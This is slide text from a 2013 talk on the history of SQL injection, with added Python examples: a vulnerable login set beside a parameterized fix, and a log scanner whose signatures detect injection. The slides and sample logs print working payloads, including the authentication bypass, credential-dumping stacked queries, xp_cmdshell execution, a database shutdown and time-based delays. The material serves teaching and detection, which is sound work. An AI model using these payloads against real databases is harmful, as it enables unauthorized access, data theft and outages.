Talk by Chema Alonso on the history and evolution of SQL Injection techniques, given at Codemotion ES 2013, held at the Escuela Universitaria de Informática of the Universidad Politécnica de Madrid
3. 25 Dec 1998: The birth
http://www.phrack.org/issues.html?id=8&issue=54
4. ' or '1'='1
admin
' or '1'='1
q="Select uid from users where uid='"+$user+"' and pass='"+$pass+"';"
q="Select uid from users where uid='admin' and pass='' or '1'='1';"
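The two query strings above show the whole mechanism: the user-supplied password closes the quoted literal and appends `or '1'='1`, so the WHERE clause is always true. The following Python example is added here and is not code from the talk; it builds a throwaway in-memory SQLite table (constructed sample data: one `admin` row) and runs the slide's payload against both a string-concatenated query that mirrors the slide and a parameterized one, which is the fix.

```python
import sqlite3

# Constructed demo database with a single user row, as in the slide's 'admin' example.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uid TEXT, pass TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    conn.commit()
    return conn

def login_vulnerable(conn, user, pw):
    # Mirrors the slide's q="Select uid from users where uid='"+$user+"' and pass='"+$pass+"';"
    # Inputs are spliced into the SQL text, so a quote inside them becomes SQL syntax.
    q = "SELECT uid FROM users WHERE uid='" + user + "' AND pass='" + pw + "';"
    row = conn.execute(q).fetchone()
    return row[0] if row else None

def login_safe(conn, user, pw):
    # Parameterized statement: the driver passes values separately from the SQL text,
    # so a quote in the password is data, never syntax.
    q = "SELECT uid FROM users WHERE uid=? AND pass=?"
    row = conn.execute(q, (user, pw)).fetchone()
    return row[0] if row else None

def demo():
    conn = make_db()
    payload = "' or '1'='1"  # the 1998 bypass string from the slide
    return {
        "vuln_bypass": login_vulnerable(conn, "admin", payload),  # 'admin': logged in without the password
        "safe_bypass": login_safe(conn, "admin", payload),        # None: payload compared as a literal string
        "safe_real": login_safe(conn, "admin", "s3cret"),         # 'admin': the real password still works
    }

if __name__ == "__main__":
    print(demo())
```

The vulnerable function succeeds with a password of `' or '1'='1`; the parameterized one only succeeds with the real password, because the placeholder binding never lets the input alter the statement's structure.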
6. 14 Aug 2007: IBM
http://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerability
10. Yesterday - [Microsoft][ODBC SQL Server Driver]
[SQL Server]Incorrect syntax near the keyword 'or'.
q="Select title from noticias where ud="+$id+";"
Id=1 or 1=(select top 1 username from sysusers)
13. Advanced Tricks
Username: '; begin declare @ret varchar(8000) set @ret=':' select
@ret=@ret+' '+username+'/'+password from users where username>@ret
select @ret as ret into foo end--
Username: ' union select ret,1,1,1 from foo--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value ': admin/r00tr0x! guest/guest chris/password
fred/sesame' to a column of data type int.
exec master..xp_cmdshell 'dir'
Id= 1; shutdown --
22. 2004: Time-Based in Other Databases
SQL Server
1) ; if … waitfor delay
2) ; exec xp_cmdshell (ping -n)
Oracle
1) dbms_lock.sleep()
PL/SQL Injection
MySQL
1) and sleep()
5.0 or higher
2) benchmark() functions
Postgres:
1) pg_sleep()
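Every technique on these slides (the 1998 authentication bypass, the error-based `or 1=(select ...)` trick, the `union select` extraction, stacked `; shutdown` / `xp_cmdshell` statements, and the per-database sleep and delay functions listed just above) leaves a recognizable signature in the request's query string. The Python example below is added here and is not code from the talk; it classifies access-log lines by which of those signatures they carry. The log lines, the Common Log Format regex and the signature patterns are all constructed for this example, and the patterns are deliberately narrow so the benign line is not flagged.

```python
import re
from urllib.parse import unquote_plus

# Signature patterns written for this example (assumption: not from the talk),
# keyed to the technique names used on the slides. Applied to the URL-decoded path.
SIGNATURES = {
    "auth_bypass": re.compile(r"'\s*or\s*'1'\s*=\s*'1", re.I),
    "error_based": re.compile(r"\bor\s+1\s*=\s*\(\s*select\b", re.I),
    "union_based": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "stacked_cmd": re.compile(r";\s*(exec\b.*xp_cmdshell|shutdown\b)", re.I),
    "time_based": re.compile(
        r"\b(waitfor\s+delay|dbms_lock\.sleep|sleep\s*\(|benchmark\s*\(|pg_sleep\s*\()", re.I),
}

# Minimal Common Log Format parser (constructed for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample lines; the payloads are the ones shown on the slides, URL-encoded.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2013:13:55:36 +0200] "GET /news?id=42 HTTP/1.1" 200 512',
    '10.0.0.7 - - [10/Oct/2013:13:55:40 +0200] "GET /login?user=admin&pass=%27+or+%271%27%3D%271 HTTP/1.1" 302 0',
    '10.0.0.7 - - [10/Oct/2013:13:55:44 +0200] "GET /news?id=1+or+1%3D(select+top+1+username+from+sysusers) HTTP/1.1" 500 231',
    '10.0.0.7 - - [10/Oct/2013:13:55:49 +0200] "GET /news?id=1+union+select+ret,1,1,1+from+foo-- HTTP/1.1" 500 318',
    '10.0.0.7 - - [10/Oct/2013:13:55:53 +0200] "GET /news?id=1%3B+shutdown+-- HTTP/1.1" 500 120',
    '10.0.0.7 - - [10/Oct/2013:13:56:10 +0200] "GET /news?id=1%3B+if+1%3D1+waitfor+delay+%270%3A0%3A5%27-- HTTP/1.1" 200 512',
]

def classify(line):
    """Parse one log line; return its decoded path and the list of matching signature names."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not in the expected format; caller decides how to handle it
    path = unquote_plus(m.group("path"))  # decode before matching, or '%27' hides the quote
    hits = [name for name, rx in SIGNATURES.items() if rx.search(path)]
    return {"ip": m.group("ip"), "path": path, "status": m.group("status"), "hits": hits}

def scan(lines):
    """Return only the parsed lines that matched at least one signature."""
    return [r for r in map(classify, lines) if r and r["hits"]]

if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        print(r["ip"], r["status"], r["hits"], r["path"])
```

Decoding before matching is the part that matters in practice: the bypass quote arrives as `%27` and the stacked-statement semicolon as `%3B`, so a pattern run over the raw log line misses them. Pairing a time-based hit with the response latency column, where the log has one, is the natural next check.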
23. Jun 2007: Solar Empire Exploit
http://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.html
25. 2007: Time-Based SQL Injection using Heavy Queries
https://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf